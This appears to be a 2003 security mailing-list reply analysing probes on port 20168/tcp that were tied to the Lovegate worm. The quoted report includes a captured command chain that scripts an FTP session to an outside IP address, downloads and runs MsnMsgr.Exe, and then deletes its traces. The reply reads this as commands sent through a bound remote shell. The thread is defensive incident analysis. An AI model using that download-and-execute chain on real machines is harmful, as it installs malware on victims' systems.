Security Incidents mailing list archives

Re: New Worm or Worm Variant?

From: Juri Haberland <juri () koschikode com>
Date: Thu, 11 Dec 2003 15:15:01 +0100

Charles Hamby wrote:

I've been seeing a jump in 20168/tcp scans over the past week or so.
This port is commonly associated with the Lovegate worm.  I recently
set up a port listener using Netcat to capture any output from probes
against a couple of my systems.  Shown below are the results:

echo open 211.26.130.118 >> wxtu.dll & echo USER noxe >> wxtu.dll &
echo noxe >> wxtu.dll & echo binary >> wxtu.dll & echo get
MsnMsgr.Exe >> wxtu.dll & echo bye >> wxtu.dll & ftp -n -s:wxtu.dll &
del wxtu.dll & start MsnMsgr.Exe


[SNIP]

At first glance it looks like some sort of non-interactive FTP
session to download an exploit (MsnMsgr.Exe), but Googling for
wxtu.dll came up empty (so this could be anything from a real .dll to
a renamed executable in my mind).  A couple of questions for the
world at large:


[SNIP]

2) Any theories on wxtu.dll?  Since I can't get a hold of the malware
to analyze it, I'm really guessing at this point.  MsnMsgr.Exe seems
to be the exploit itself, it it appears to be using something like
FTPCOM to do a non-interactive FTP session, but wxtu.dll could be
anything from a real .dll file to a renamed executable.  Ideas?


My theory is as follows:
Something on the target machine (whatever it was - possibly some kind of
worm) opened port 20168/tcp and bound a shell to it. What you are seeing
is someone connecting to this remote shell issuing some commands. These
commands echo some ftp commands into an previously not existing file
called wxtu.dll, then running ftp in non-interactive mode to download
MsnMsgr.Exe, which might be just something like BackOrifice, and then
deleting the wxtu.dll file.

So the wxtu.dll file is just a text file created by the commands that
you captured - the real problem is: what opened port 20168/tcp on that
machine?

Cheers,
Juri


---------------------------------------------------------------------------
----------------------------------------------------------------------------

Current thread:

New Worm or Worm Variant? Charles Hamby (Dec 10)
- Re: New Worm or Worm Variant? Harlan Carvey (Dec 11)
  - Another New Worm or Worm Variant? David Gillett (Dec 11)
- Re: New Worm or Worm Variant? Juri Haberland (Dec 11)
- <Possible follow-ups>
- Re: New Worm or Worm Variant? Joris De Donder (Dec 11)
  - RE: New Worm or Worm Variant? Charles Hamby (Dec 11)
- FW: New Worm or Worm Variant? Bassett, Mark (Dec 11)